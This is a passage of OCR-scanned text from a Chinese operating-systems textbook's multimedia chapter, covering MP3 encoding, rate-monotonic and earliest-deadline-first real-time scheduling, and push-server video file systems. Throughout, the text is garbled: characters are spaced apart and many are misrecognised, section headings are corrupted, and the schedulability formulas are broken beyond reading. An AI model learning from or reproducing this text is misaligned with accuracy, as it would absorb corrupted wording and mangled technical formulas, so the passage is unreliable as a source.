所 屏蔽 的 信号 ， 可 以 省 略 越 来 越 多 的 编码 信号 中 的 频率 ， 以 此 来 节约 二 
进 制 位 。 在 图 7-12 中 ，125Hz 信 号 的 输出 是 可 以 完全 忽略 掉 的 ， 并 且 没 








有 人 能 够 听 出 其 中 的 不 同 。 甚 至 当 茶 个 频段 中 的 一 个 强大 信和 号 停止 后 ， 
出 于 对 和 暂时 屏蔽 这 一 知识 的 了 解 ， 也 会 让 我 们 在 耳 和 东 恢 复 期 的 时 间 段 内 
省 略 掉 那 些 被 屏蔽 的 频率 。MP3 编 码 的 实质 就 是 对 声音 做 傅立叶 变换 从 
而 得 到 每 个 频率 的 能 量 ， 之 后 只 传递 那些 不 被 屏蔽 折 的 频率 ， 并 且 用 尽 
可 能 少 的 二 进 制 位 数 来 编码 这 些 频 率 。 














有 了 这 些 信息 作为 背景 ， 现 在 来 考察 有 关 编 码 是 如 何 完成 的 。 通 过 

抽取 32kHz、44.1kHz 或 者 48 kHz 的 波形 ， 完 成 声音 压缩 。 第 一 个 和 最 后 

-个 都 是 四 舍 五 入 的 整数 。44.1kHz 是 用 于 Audio CD 的 ， 因 为 这 个 值 能 

很 好 地 捕获 人 耳 可 上 听 到 的 所 有 音频 信息 。 可 以 在 以 下 四 个 配置 中 任 选 一 
， 用 一 或 两 个 通道 完成 抽样 : 





1) 单 声 道 〈 一 个 输入 流 ) o 


2) 双 声 道 〈 例 如， 一 个 英语 的 和 一 个 日 语 的 音 轨 ) 。 





个 通道 分 开 压 缩 ) 。 


Ne 


3) 分 立 立 体 声 〈 

4) 联 合 立 体 声 〈 完 全 利用 通道 间 的 元 余 ) 。 

首先 ， 选 择 输 出 的 比特 率 。MP3 可 以 将 摇滚 CD 的 立体 声 降 低 到 
96kbps， 并 且 在 质量 上 几乎 没有 任何 失真 ， 甚 至 连 摇滚 迷 都 听 不 出 关 


a a sd 
是 因为 摇 深 的 信 品 比 要 比 一 场 钢琴 音乐 会 要 高 得 多 (至 少 从 工程 角度 上 




















A) 。 也 可 以 选择 稍 低 一 点 的 输出 比率 ， 接 受 质量 上 的 少许 失真 。 


然后 将 这 些 样本 处 理 成 1152〈 大 概 26ms) 的 一 些 组 ， 每 组 首先 通过 
32 个 数字 滤波 器 ， 获 得 32 个 频率 波段 。 同 时 ， 将 输入 放 进 一 个 心理 声学 
的 模型 中 ， 测 定 被 屏蔽 的 频率 。 接 下 来 ， 进 一 步 转换 32 频 率 波段 中 的 每 


一 个 ， 以 提供 一 个 更 精确 的 频谱 解决 方案 。 


接着 ， 将 现 有 的 二 进 制 位 分 配 到 各 个 波段 中 ， 大 部 分 二 进 制 位 分 配 
给 拥有 多 数 频 详 能 量 的 未 屏蔽 波段 ， 小 部 分 二 进 制 位 分 配给 拥有 较 少 频 
说 能 量 的 未 屏蔽 波段 ， 已 屏 藤 的 波段 不 分 配 二 进 制 位 。 最 后 ， 用 霍 夫 曼 
编码 来 对 这 些 二 进 制 位 进行 编码 ， 它 可 以 将 经 常 出 现 的 数字 赋予 较 短 的 
代码 ， 而 对 不 常 出现 的 数字 赋予 较 长 的 代码 。 


实际 的 工作 过 程 更 复杂 。 为 了 减少 噪音 ， 消 除 混 消 ， 以 及 利用 通关 
间 元 余 ， 需 要 各 种 各 样 的 技术 ， 不 过 这 些 内 容 超 出 了 本 书 的 范围 。 


7.5 多 媒体 进程 调度 


支持 多 媒体 的 操作 系统 与 传统 的 操作 系统 在 三 个 主要 的 方面 有 所 区 
别 : 进程 调度 、 文 件 系统 和 磁盘 调度 。 本 节 中 我 们 开始 讨论 进程 调度 ， 
在 后 面 的 各 节 中 接着 讨论 其 他 主题 。 





7.5.1 ”调度 同 质 进程 





最 简单 的 一 种 视频 服务 器 可 以 文 持 显示 固定 数目 的 电影 ， 所 有 电影 
使 用 相同 的 帧 率 、 视 频 分 辨 率 、 数 据 率 以 及 其 他 参数 。 在 这 样 的 情况 
下 ， 可 以 采用 下 述 简单 但 是 有 效 的 调度 算法 。 对 每 一 部 电影 ， 存 在 一 个 
进程 (或 线程 》， 其 工作 是 每 次 从 磁盘 中 读 取 电 影 的 一 帧 然后 将 该 帧 传 
送 给 用 户 。 由 于 所 有 的 进程 同等 重要 ， 每 一 帧 有 相同 的 工作 量 要 做 ， 并 
且 当 它们 完成 当前 帧 的 处 理 时 将 阻 赛 ， 所 以 采用 轮转 调度 可 以 很 好 地 做 
这 样 的 工作 。 将 调度 算法 标准 化 的 惟一 的 额外 要 求 是 定时 机 制 ， 以 确保 
每 一 进程 以 恰当 的 频率 运行 。 











实现 适当 定时 的 一 种 方式 是 有 一 个 主 控 时 钟 ， 该 时 钟 每 秒 滴答 适当 
的 次 数 ， 例 如 针对 NTSC 制 式 ， 每 秒 滴 答 30 次 。 在 时 钟 的 每 一 滴答 ， 所 
有 的 进程 以 相同 的 次 序 相继 运行 。 当 一 个 进程 完成 其 工作 时 ， 它 将 发 出 
suspend 系 统 调用 释放 CPU 直到 主 控 时 钟 再 次 滴答 。 当 主 控 时 钟 再 次 滴答 





时 ， 上 所 有 的 进程 再 次 以 相同 的 次 序 运 行 。 只 要 进程 数 足 够 少 ， 所 有 的 工 
作 都 可 以 在 一 帧 的 时 间 内 完成 ， 采 用 轮转 调度 惑 足够 了 。 


752 —ACSCAY ial FE 


不 笠 的 是 ， 这 一 模型 在 实践 中 几乎 没有 什么 用 处 。 随 着 观众 的 来 来 
去 去 ， 用 户 的 数目 不 断 发 生变 化 ， 由 于 视频 压缩 的 本 性 〈I 帧 比 P 帧 或 B 
WATE ) ， 帧 的 大 小 剧烈 变化 ， 并 且 不 同 的 电影 可 能 有 不 同 的 分 辩 
率 。 因 此 ， 不 同 的 进程 可 能 必须 以 不 同 的 频率 运行 ， 具 有 不 同 的 工作 
量 ， 并 且 有 具有 不 同 的 最 终 时 限 〈 在 此 之 前 所 有 工作 必须 完成 ) 。 











这 些 考虑 导致 一 个 不 同 的 模型 : 多 个 进程 竞争 CPU， 每 个 进程 有 自 
己 的 工作 量 和 最 终 时 限 。 在 下 面 的 模型 中 ， 我 们 将 假设 系统 知道 每 个 进 
程 必须 以 什么 样 的 频率 运行 、 有 多 少 工作 要 做 以 及 下 一 个 最 终 时 限 是 什 
么 。《〈 磁 盘 调度 也 是 一 个 问题 ， 但 我 们 将 在 后 面 考 虑 。) 多 个 相互 竞争 
的 进程 ， 其 中 奋 干 进程 或 全 部 进程 具有 必须 满足 的 最 终 时限 的 调度 称 为 
实时 调度 (real-time scheduling) 。 











作为 实时 多 媒体 调度 程序 工作 环境 的 一 个 例子 ， 我 们 考虑 三 个 进程 
A、B 和 C， 如 图 7-13 所 示 。 进 程 A 每 30ms 运 行 一 次 (近似 NTSC 制 式 速 
FE) ， 每 一 帧 需要 10ms 的 CPU 时 间 。 在 不 存在 竞争 的 情况 下 ， 进 程 A 将 
在 突 及 A1、A2、A3 等 中 运行 ， 每 一 突 发 在 前 一 突 发 的 30ms 之 后 开始 。 
每 个 CPU 突 发 处 理 一 帧 并 且 具 有 一 个 最 终 时 限 : 它 必 须 在 下 一 个 突 发 开 
台 之 前 完成 。 
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图 7-13 三 个 周期 性 的 进程 ， 每 个 进程 播放 一 部 电影 ; 每 一 电影 的 帧 
率 以 及 每 帧 的 处 理 需 求 有 所 不 同 





图 7-13 中 还 有 另外 两 个 进程 : B 和 C。 进 程 B 每 秒 运 行 25 次 《例如 
PAL 制 式 ) ， 进 程 C 每 秒 运行 20 次 (例如 一 个 慢 下 来 的 NTSC 或 PAL 流 ， 
意 在 使 一 个 低 带 宽 的 用 户 连 接 到 视频 服务 器 ) 。 每 一 帧 的 计算 时 间 如 图 
7-13 中 所 示 ， 进 程 B 为 15ms， 进 程 C 为 5ms， 没 有 使 它们 都 具有 相同 的 时 
司 只 是 为 了 使 调度 问题 更 加 一 般 化 。 








现在 调度 问题 是 如 何 调度 A、B 和 C 以 确保 它们 满足 各 自 的 最 终 时 
限 。 在 寻找 调度 算法 之 前 ， 我 们 必须 看 一 看 这 一 组 进程 究竟 是 不 是 可 调 
度 的 。 回 想 2.4.4 节 ， 如 果 进 程 i 具 有 Pi ms 的 周期 并 且 需 要 Ci ms 的 CPU 时 
间 ， 那 么 系统 是 可 调度 的 当 且 仅 当 











AC 


om, 
Il 
m 


其 中 m 是 进程 数 ， 在 本 例 中 ，m=3。 注 意 ，C; /P; 只 是 CPU 被 进程 
使 用 的 部 分 。 就 图 7-13 所 示 的 例子 而 言 ， 进 程 A 用 掉 CPU 的 10/30， 进 程 
B 用 掉 CPU 的 15/40， 进 程 C 用 掉 CPU 的 5/50。 将 这 些 分 数 加 在 一 起 为 
CPU 的 0.808， 所 以 该 系统 是 可 调度 的 。 





到 目前 为 止 我 们 假设 每 个 影片 流 有 一 个 进程 ， 实 际 上 ， 每 个 影片 流 
可 能 有 两 个 (或 更 多 个 ) 进程 ， 例 如 ， 一 个 用 于 音频 ， 一 个 用 于 视频 。 
它们 可 能 以 不 同 的 速率 运行 并 且 每 一 脉冲 可 能 消耗 不 同 数量 的 CPU 时 
间 。 然 而 ， 将 音频 进程 加 入 到 系统 中 并 没有 改变 一 般 模 型 ， 因 为 我 们 的 
全 部 假设 是 存在 m 个 进程 ， 每 个 进程 以 一 个 固定 的 频率 运行 ， 对 每 一 
CPU 突 发 有 固定 的 工作 量 要 求 。 














在 东 些 实时 系统 中 ， 进 程 是 可 抢占 的 ， 在 其 他 的 系统 中 ， 进 程 是 不 
可 抢占 的 。 在 多 媒体 系统 中 ， 进 程 通常 是 可 抢占 的 ， 这 意味 着 允许 有 人 危 
险 错过 其 最 终 时 限 的 进程 在 正在 运行 的 进程 完成 工作 以 前 将 其 中 断 ， 然 
后 当 它 完成 工作 之 后 ， 被 中 断 的 前 一 个 进程 再 继续 运行 。 这 一 行为 只 不 
过 是 多 道 程序 设计 ， 正 如 我 们 在 前 面 已 经 看 过 的 。 我 们 要 研究 的 是 可 抢 
占 的 实时 调度 算法 ， 因 为 在 多 媒体 系统 中 没有 拒绝 它们 的 理由 并 且 它 们 
比 不 可 抢占 的 调度 算法 具有 更 好 的 性 能 。 惟 一 要 关心 的 是 如 果 传输 缓冲 
区 在 很 少 的 几 个 突 发 中 被 填充 ， 那 么 在 最 终 时 限 到 来 之 前 该 缓冲 区 应 该 
古 完全 满 的 ， 这 样 它 就 可 以 在 一 次 操作 中 传递 给 用 户 ， 否 则 束 会 引起 颤 
动 。 











实时 算法 可 以 是 静态 的 也 可 以 是 动态 的 。 静 态 算法 预先 分 配给 每 个 
进程 一 个 固定 的 优先 级 ， 然 后 使 用 这 些 优 先 级 做 基于 优先 级 的 抢占 调 


度 。 动 态 算 法 没有 固定 的 优先 级 。 下 面 我 们 将 研究 每 种 类 型 的 一 个 例 
to 


7.5.3 ”速率 单调 调度 


适用 于 可 抢占 的 周期 性 进程 的 经 典 静 态 实 时 调度 算法 是 速率 单调 调 
Æ (Rate Monotonic Scheduling, RMS) (Liu 和 Layland,1973) 。 它 可 
以 用 于 满足 下 列 条 件 的 进程 : 





1) 每 个 周期 性 进程 必须 在 其 周期 内 完成 。 

2) 没 有 进程 依赖 于 任何 其 他 进程 。 

3) 每 一 进程 在 一 次 突 太 中 需要 相同 的 CPU 时 间 量 。 
4) 任 何 非 周 期 性 进程 都 没有 最 终 时 限 。 

5) 进 程 抢占 即刻 发 生 而 没有 系统 开销 。 


前 四 个 条 件 是 合理 的 。 当 然 ， 最 后 一 个 不 是 ， 但 是 该 条 件 使 系统 建 
模 更 加 容易 。RMS 分 配给 每 个 进程 一 个 固定 的 优先 级 ， 优 先 级 等 于 进程 
触发 事件 发 生 的 频率 。 例 如 ， 必 须 每 30ms 运 行 一 次 (每 秒 33 次 ) 的 进程 
获得 的 优先 级 为 33， 必 须 每 40ms 运 行 一 次 (每 秒 25 次 ) 的 进程 获得 的 优 
先 级 为 25， 必 须 每 50ms 运 行 一 次 (每 秒 20 次 ) 的 进程 获得 的 优先 级 为 
20。 所 以 ， 优 先 级 与 进程 的 速率 〈 每 秒 运 行进 程 的 次 数 ) 成 线性 关系 ， 
这 正 是 为 什么 将 其 称 为 速率 单调 的 原因 。 在 运行 时 ， 调 度 程 序 总 是 运行 





优先 级 最 高 的 就 绪 进 程 ， 如 果 需 要 则 抢占 正在 运行 的 进程 。Liu 和 
Layland 证 明了 在 静态 调度 算法 种 类 中 RMS 是 最 优 的 。 


图 7-14 演 示 了 在 图 7-13 所 示 的 例子 中 速率 单调 调度 是 如 何 工 作 的 。 
进程 A、B 和 C 分 别 具 有 静态 优先 级 33、25 和 20， 这 意味 着 只 要 A 需 要 运 
行 ， 它 就 可 以 运行 ， 抢 占 任 何 当前 正在 使 用 CPU 的 其 他 进程 。 进 程 B 可 
以 抢占 C， 但 不 能 抢占 A。 进 程 C 必 须 等 待 直到 CPU 空闲 才能 运行 。 














图 7-14 RMS 和 EDF 实 时 调度 的 一 个 例子 


在 图 7-14 中 ， 最 初 所 有 三 个 进程 都 就 绕 要 运行 ， 优 先 级 最 高 的 进程 
A 被 选中 ， 并 准许 它 运行 直到 它 在 10ms 时 完成 ， 如 图 7-14 中 的 RMS 一 行 
所 示 。 在 进程 A 完成 之 后 ， 进 程 B 和 C 以 先后 次 序 运行 。 合 起 来 ， 这 些 进 
程 花费 了 30ms 的 时 间 运 行 ， 所 以 当 C 完 成 的 时 候 ， 正 是 该 A 再 次 运行 的 
时 候 。 这 一 轮换 持续 进行 直到 t=70 时 系统 变 为 空闲。 








在 二 80 时 ， 进 程 B 惑 绪 并 开始 运行 。 然 而 ， 在 导 90 时 ， 优 移 级 更 高 
的 进程 A 变 为 就 绪 ， 所 以 它 抢 占 B 并 运行 ， 直 到 在 t=100 时 完成 。 在 这 一 
时 刻 ， 系 统 可 以 在 结束 进程 B 或 者 开始 进程 C 之 间 进 行 选择 ， 所 以 它 选 
择优 先 级 最 高 的 进程 B。 











7.5.4 最 早 最 终 时 限 优先 调度 








男 一 个 流行 的 实时 调度 算法 是 最 早 最 终 时 限 优先 (Earliest Deadline 
First, EDF) 算法 。EDF 是 一 个 动态 算法 ， 它 不 像 速 率 单调 算法 那样 要 
求 进 程 是 周期 性 的 。 它 也 不 像 RMS 那 样 要 求 每 个 CPU 突 发 有 相同 的 运行 
时 间 。 只 要 一 个 进程 需要 CPU 时 间 ， 它 就 宣布 它 的 到 来 和 最 终 时 限 。 调 
度 程 序 维持 一 个 可 运行 进程 的 列表 ， 该 列表 按 最 终 时 限 排序 。EDF 算 法 
运行 列表 中 的 第 一 个 进程 ， 也 就 是 具有 最 近 最 终 时 限 的 进程 。 当 一 个 新 
的 进程 就 绪 时 ， 系 统 进行 检查 以 了 解 其 最 终 时 限 是 否 发 生 在 当前 运行 的 
进程 结束 之 前 。 如 果 是 这 样 ， 新 的 进程 就 抢占 当前 正在 运行 的 进程 。 





























图 7-14 给 出 了 EDF 的 一 个 例子 。 最 初 所 有 三 个 进程 都 是 就 绪 的 ， 它 
们 按 其 最 终 时 限 的 次 序 运 行 。 进 程 A 必 须 在 t=30 之 前 结束 ，B 必 须 在 t=40 
之 前 结束 ，C 必 须 在 t=50 之 前 结束 ， 所 以 A 具有 最 早 的 最 终 时 限 并 因此 
而 先 运行 。 直 到 t=90， 选 择 都 与 RMS 相 同 。 在 t=90 时 ，A 再 次 就 绕 ， 并 
且 其 最 终 时 限 为 t=120， 与 B 的 最 终 时 限 相 同 。 调 度 程序 可 以 合理 地 选择 
其 中 任何 一 个 运行 ， 但 是 由 于 抢占 B 具 有 某 些 非 零 的 代价 与 之 相 联 系 ， 
所 以 最 好 是 让 B 继 续 运行 ， 而 不 去 承担 切换 的 代价 。 























为 了 消除 RMS 和 EDF 总 是 给 出 相同 结果 的 想法 ， 现 在 让 我 们 看 一 看 
另外 一 个 例子 ， 如 图 7-15 所 示 。 在 这 个 例子 中 ， 进 程 A、B 和 C 的 周期 与 











前 面 的 例子 相同 ， 但 是 现在 A 每 次 突 发 需要 15ms 的 CPU 时 间 ， 而 不 是 只 
有 10ms。 可 调度 性 测试 计算 CPU 的 利用 率 为 0.500+0.375+0.100=0.975。 
CPU 只 留 下 了 2.59%6， 但 是 在 理论 上 CPU 并 没有 被 超额 预定 ， 找 到 一 个 合 
理 的 调度 应 该 是 可 能 的 。 
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图 7-15 ”以 RMS 和 和 EDF 进行 实时 调度 的 为 一 个 例子 


对 于 RMS， 三 个 进程 的 优先 级 仍 为 33、25 和 20， 因 为 优先 级 只 与 周 
期 有 关系 ， 而 与 运行 时 间 没 有 关系 。 这 一 次 ， 进 程 B 直 到 t=30 才 结束 ， 
在 这 一 时 刻 ， 进 程 A 再 次 就 绪 要 运行 。 等 到 A 结束 时 ，t=45， 此 时 B 再 次 
就 绪 ， 由 于 它 的 优先 级 高 于 C， 所 以 B 运 行 而 C 则 错过 了 其 最 终 时 限 。 
RMS 失 败 。 





现在 看 一 看 EDF 如 何 处 理 这 种 情况 。 当 t=30 时 ， 在 A2 和 C1 之 间 存 在 
竞争 。 因 为 C1 的 最 终 时 限 是 50， 而 A2 的 最 终 时 限 是 60， 所 以 C 被 调度 。 
这 就 不 同 于 RMS， 在 RMS 中 A 由 于 较 高 的 优先 级 而 成 为 赢家 。 





当 t90 时 ，A 第 四 次 就 绪 。A 的 最 终 时 限 与 当前 进程 相同 〈 同 为 
120) ， 所 以 调度 程序 面临 抢占 与 否 的 选择 。 如 前 所 述 ， 如 果 不 是 必要 
最 好 不 要 抢占 ， 所 以 B3 被 允许 完成 。 


在 图 7-15 所 示 的 例子 中 ， 直 到 t=150，CPU 都 是 100% 被 占用 的 。 然 
而 ， 因 为 CPU 只 有 97.5% 被 利用， 所 以 最 终 将 会 出 现 间 际 。 由 于 所 有 开 
始 和 结束 时 间 都 是 5ms 的 倍数 ， 所 以 间 隐 将 是 sms。 为 了 获得 要 求 的 
2.59% 的 空闲 时 间 ，5ms 的 间 辽 必须 每 200ms 出 现 一 次 ， 这 就 是 间 辽 为 什 
么 没有 在 图 7-15 中 出 现 的 原因 。 


一 个 有 趣 的 问题 是 RMS 为 什么 会 失败 。 根 本 上 ， 使 用 静态 优先 级 只 
有 在 CPU 的 利用 率 不 太 高 的 时 候 才 能 工作 。Liu 和 Layland (1973) 证 明 
了 对 于 任何 周期 性 进程 系统 ， 如 果 





ie <m(2""—1) 

那么 就 可 以 保证 RMS 工 作 。 对 于 m=3、4、5、10、20 和 100， 最 大 
允许 利用 率 为 0.780、0.757、0.743、0.718、0.705 和 0.696。 随 着 m -> o, 
最 大 利用 率 逼 近 ln 2。 换 句 话 说 ，Liu 和 Layland 证 明了 ， 对 于 三 个 进程 ， 
如 果 CPU 利 用 率 等 于 或 小 于 0.780， 那 么 RMS 总 是 可 以 工作 的 。 在 第 一 
个 例子 中 ，CPU 利 用 率 为 0.808 而 RMS 工 作 正 常 ， 但 那 只 不 过 是 幸运 黑 
了 。 对 于 不 同 的 周期 和 运行 时 间 ， 利 用 率 为 0.808 很 可 能 会 失败 。 在 第 





二 个 例子 中 ，CPU 利 用 率 如 此 之 高 〈0.975) ， 根 本 不 存在 RMS 能 够 工 
作 的 希望 。 





与 此 相对 照 ，EDF 对 于 任意 一 组 可 调度 的 进程 总 是 可 以 工作 的 ， 它 
可 以 达到 100% 的 CPU 利用 率 ， 付 出 的 代价 是 更 为 复杂 的 算法 。 因 而 ， 
在 一 个 实际 的 视频 服务 器 中 ， 如 果 CPU 利 用 率 低 于 RMS 限 度 ， 可 以 使 用 


RMS， 否 则 ， 应 该 选择 EDF。 


7.6 多 媒体 文件 系统 范 型 





至 此 我 们 已 经 讨论 了 多 媒体 系统 中 的 进程 调度 ， 下 面 继续 我 们 的 研 
究 ， 看 一 看 多 媒体 文件 系统 。 这 样 的 文件 系统 使 用 了 与 传统 文件 系统 不 
同 的 范 型 。 我 们 首先 回顾 传统 的 文件 TO， 然 后 将 注意 力 转 同 多 媒体 文 
件 服务 器 是 如 何 组 织 的 。 进 程 要 访问 一 个 文件 时 ， 首 先 要 发 出 open 系 统 
调用 。 如 果 该 调用 成 功 ， 则 调用 者 被 给 予 菏 种 令 牌 以 便 在 未 来 的 调用 中 
使 用 ， 该 令 牌 在 UNIX 中 被 称 为 文件 描述 符 ， 在 Windows 中 被 称 为 句 
柄 。 这 时 ， 进 程 可 以 发 出 read 系 统 调 用 ， 提 供 令 牌 、 绥 冲 区 地 址 和 字 节 
计数 作为 参数 。 操 作 系统 则 在 缓冲 区 中 返回 请 求 的 数据 。 以 后 还 可 以 发 
出 男 外 的 read 调 用 ， 直 到 进程 结束 ， 在 进程 结束 时 它 将 调用 close 以 关闭 
文件 并 返回 其 资源 。 





由 于 实时 行为 的 需要 ， 这 一 模型 对 于 多 媒体 并 不 能 很 好 地 工作 。 在 
显示 来 日 远程 视频 服务 器 的 多 媒体 文件 时 ， 该 模型 的 工作 尤为 拙 务 。 第 
一 个 问题 是 用 户 必 须 以 相当 精确 的 时 间 间 隔 进行 read 调 用 。 第 二 个 问题 
征 视 频 服 务 器 必须 能 够 没有 延迟 地 提供 数据 块 ， 当 请 求 没 有 计划 地 到 来 
并 且 预 先 没 有 保留 资源 时 ， 做 到 这 一 点 是 十 分 困难 的 。 


为 解雇 这 些 问 题 ， 多 媒体 文件 服务 器 使 用 了 一 个 完全 不 同 的 范 型 : 
像 录 像 机 (Video Cassette Recorder, VCR) 一 样 工作 。 为 了 读 取 一 个 多 
媒体 文件 ， 用 户 进 程 发 出 start 系 统 调用 ， 指 定 要 读 的 文件 和 各 种 其 他 参 


数 ， 例 如 ， 要 使 用 哪些 音频 和 字幕 轨迹 。 接 着 ， 视 频 服务 器 开始 以 必要 
的 速率 送出 帧 。 然 后 用 户 进 程 以 帧 进来 的 速率 对 它们 进行 处 理 。 如 果 用 
户 对 所 看 的 电影 感到 厌烦 ， 那 么 发 出 stop 系 统 调用 可 以 将 数据 流 终止。 
具有 这 种 数据 流 模 型 的 文件 服务 器 通常 被 称 为 推送 型 服务 器 (push 
server) ， 因 为 它 将 数据 推送 给 用 户 ;与 此 相对 照 的 是 传统 的 拉 取 型 服 
务 器 (pull server) ， 用 户 不 得 不 通过 重复 地 调用 read 一 块 接 一 块 地 取得 
数据 ， 每 调用 一 次 可 以 拉 取 出 一 块 数据 。 这 两 个 模型 之 间 的 区 别 如 图 7- 
16 所 示 。 
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图 7-16 习 拉 取 型 服务 器 ; b) 推 送 型 服务 
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7.6.1 VCR 控 制 功 能 


大 多 数 视频 服务 器 也 实现 了 标准 的 VCR 控 制 功 能 ， 包 括 暂 俘 、 快 进 





和 倒 带 。 和 暂停 是 相当 简单 的 。 用 户 发 送 一 个 消息 给 视频 服务 器 ， 告 诉 它 
停止 。 视 频 服务 器 此 时 要 做 的 全 部 事情 是 记 住 下 一 次 要 送出 的 是 哪 一 
帧 。 当 用 户 要 求 服 务 句 恢复 播放 时 ， 服 务 器 只 要 从 它 集 止 的 地 方 继续 就 
可 以 了 。 





然而 ， 这 里 存在 着 一 个 复杂 因素 。 为 了 获得 可 接受 的 性 能 ， 服 务 器 
应 该 为 每 个 流出 的 数据 流 保留 诸如 磁盘 融 宽 和 内 存 缓冲 区 等 资源 。 当 电 
影 暂停 时 继续 占用 这 些 资 源 将 造成 浪费 ， 特 别 是 如 果 用 户 打 算 到 厨房 中 
找到 一 块 冷冻 的 比萨 饼 (或 许 是 特大 号 的 ) 、 用 微波 炉 豆 调 并 且 美 餐 一 
顿 的 时 候 。 当 然 ， 在 暂停 的 时 候 可 以 很 容易 地 将 资源 释放 ， 但 是 这 引入 
了 风险 : 当 用 户 试图 恢复 播放 的 时 候 ， 有 可 能 无 法 重新 获得 这 些 资 源 。 





真正 的 倒 带 实际 上 非常 简单 ， 没 有 任何 复杂 性 。 服 务 器 要 做 的 全 部 
事情 是 注意 到 下 一 次 要 送出 的 帧 是 第 0 帧 。 还 有 比 这 更 容易 的 吗 ? 然 
而 ， 快 进 和 快 倒 《也 惑 是 在 倒 融 的 同时 播放 ) 就 难处 理 多 了 。 如 果 没 有 
压缩 ， 那 么 以 10 倍 的 速度 前 进 的 一 种 方法 是 每 10 帧 只 显示 一 帧 ， 以 20 倍 
的 速度 前 进 则 要 求 每 20 帧 显示 一 帧 。 实 际 上 ， 在 不 存在 压缩 的 情况 下 ， 
以 任意 速度 前 进 和 后 退 都 是 十 分 容易 的 。 要 以 正常 速度 的 k 们 运行， 只 
要 每 k 帧 显示 一 帧 就 可 以 了 。 要 以 正常 速度 的 k 倍 后 退 ， 只 要 治 必 一 个 方 
回 做 相同 的 事情 就 可 以 了 。 这 一 方法 在 推送 型 服务 器 和 拉 取 型 服务 圳 上 
工作 得 同样 好 。 




















压缩 则 使 快 进 和 快 倒 复 杂 起 来 。 对 于 便携 式 摄像 机 的 DV 磁 带 ， 由 


于 其 每 一 帧 都 是 独立 于 其 他 帧 而 压缩 的 ， 所 以 只 要 能 够 快速 地 找到 所 需 
要 的 帧 ， 使 用 这 一 策略 还 是 有 可 能 的 。 由 于 视 其 内 容 不 同 每 一 帧 的 压缩 
量 也 有 上 所 不 同 ， 所 以 每 一 帧 具有 不 同 的 大 小 ， 因 而 在 文件 中 辐 前 跳 过 k 
帧 并 不 能 通过 数字 计算 来 完成 。 此 外 ， 音 频 压缩 是 独立 于 视频 压缩 的 ， 
所 以 对 于 在 高 速 模式 中 显示 的 每 一 视频 帧 ， 还 必须 找到 正确 的 音频 帧 

《除非 在 高 于 正 第 速 度 播 放 时 将 声音 关闭 ) 。 因 此 ， 对 一 个 DV 文件 进 
行 快 进 操作 需要 有 一 个 索引 ， 该 索引 可 以 使 帧 的 查找 快速 地 实现 ， 但 是 
至 少 在 理论 上 这 样 做 是 可 行 的 。 











对 于 MPEG， 由 于 使 用 其、P 帧 和 B 帧 ， 这 一 方案 即使 在 理论 上 也 
古 不 能 工作 的 。 疝 前 跳 过 k 帧 残 算 假设 能 这 样 做 〉 可 能 落 在 一 个 P 帧 
上 上， 而 这 个 P 帧 则 基于 刚刚 跳 过 的 一 个 1 帧 。 没 有 基本 帧 ， 只 有 从 基本 帧 
发 生 的 增 量 变化 (这 正 是 P 帧 所 包含 的 ) 是 无 用 的 。MPEG 要 求 按 顺序 
播放 文件 。 





攻克 这 一 难题 的 妨 一 个 方法 是 实际 尝试 以 10 倍 的 速度 顺序 地 播放 文 
件 。 然 而 ， 这 样 做 吏 要 求 以 10 倍 的 速度 将 数据 拉 出 磁盘 。 此 时 ， 服 务 吉 
可 能 试图 将 帧 解压 缩 ( 这 是 正常 情况 下 服务 占 不 需要 做 的 事情 )， 判 定 
需要 哪 一 帧 ， 然 后 每 隔 10 帧 重新 压缩 成 一 个 I 帧 。 然 而 ， 这 样 做 给 服务 
铝 增 加 了 沉重 的 人 负担。 这 一 方法 还 要 求 服 务 占 了 解压 缩 格 式 ， 正 常情 况 
下 服务 右 不 必 了 解 这 些 东 西 。 





作为 瑟 代 ， 可 以 通过 网 络 实际 发 送 所 有 的 数据 给 用 户 ， 并 在 用 户 端 





选 出 正确 的 帧 ， 这 样 做 就 要 求 网 络 以 10 倍 的 速度 运行 ， 这 或 许 是 可 行 
的 ， 但 是 在 这 么 高 的 速度 下 正常 操作 肯定 不 是 一 件 容 易 的 事情 。 











总 而 言 之 ， 不 存在 容易 的 方法 。 惟 一 可 行 的 策略 要 求 预先 规划 。 可 
以 做 的 事情 是 建立 一 个 特殊 的 文件 ， 包 含 每 隔 10 帧 中 的 一 帧 ， 并 且 将 该 
文件 以 通常 的 MPEG 算 法 进行 压缩 。 这 个 文件 正 是 在 图 7-3 中 注 为 “ 快 
进 ” 的 那个 文件 。 要 切换 到 快 进 模 式 ， 服 务 器 必须 判定 在 快 进 文 件 中 用 
户 当 前 所 在 的 位 置 。 人 例如， 如果 当前 帧 是 48 210 并 且 快 进 文件 以 10 倍 的 
速度 运行 ， 那 么 服务 此 在 快 进 文件 中 必须 定位 到 4821 帧 并 且 在 此 处 以 正 
常 速 度 开 始 播放 。 当 然 ， 这 一 帧 可 能 是 P 帧 或 B 帧 ， 但 是 客户 端的 解码 
进程 可 以 简单 地 跳 过 符 干 帧 直到 看 见 一 个 I 帆 。 利 用 特别 准备 的 快 倒 文 
件 ， 可 以 用 类 似 的 方法 实现 快 倒 。 








当 用 户 切 换 回 到 正常 速度 时 ， 必 须 使 用 相反 的 技巧 。 如 果 在 快 进 文 
件 中 当前 帧 是 5734， 服 务 器 只 要 切换 回 到 常规 文件 并 且 从 57 340 帧 处 继 
续 播放 。 同 样 ， 如 果 这 一 帧 不 是 一 个 I 帧 ， 客 户 端的 解码 进程 必须 忽略 
所 有 的 帧 直到 看 见 一 个 I 帧 。 


尽管 有 了 这 两 个 额外 的 文件 可 以 做 这 些 工作 ， 这 一 方案 还 是 有 某 些 
缺点 。 首 先 ， 需 要 东 些 额外 的 磁盘 空间 来 存放 额外 的 文件 。 其 次 ， 快 进 
和 倒 带 只 能 以 对 应 于 特别 文件 的 速度 进行 。 第 三 ， 在 常规 文件 、 快 进 文 
件 和 快 倒 文 件 之 间 来 回 切换 需要 额外 的 复杂 算法 。 





7.6.2 ”近似 视频 点 播 


有 k 个 用 户 取得 相同 的 电影 和 这 些 用 户 取得 k 部 不 同 的 电影 在 本 质 上 
给 服务 器 施加 了 相同 的 工作 量 。 然 而 ， 通 过 对 模型 做 一 个 小 小 的 修改 ， 
就 可 能 获得 巨大 的 性 能 改进 。 视 频 点 播 面 临 的 问题 是 用 户 可 能 在 任意 时 
刻 开始 观看 一 部 电影 ， 所 以 ， 如 果 有 100 个 用 户 全 部 在 晚 8 点 左右 开始 观 
看 某 个 新 电影 ， 很 可 能 不 会 有 两 个 用 户 在 完全 相同 的 时 刻 开 始 ， 所 以 他 
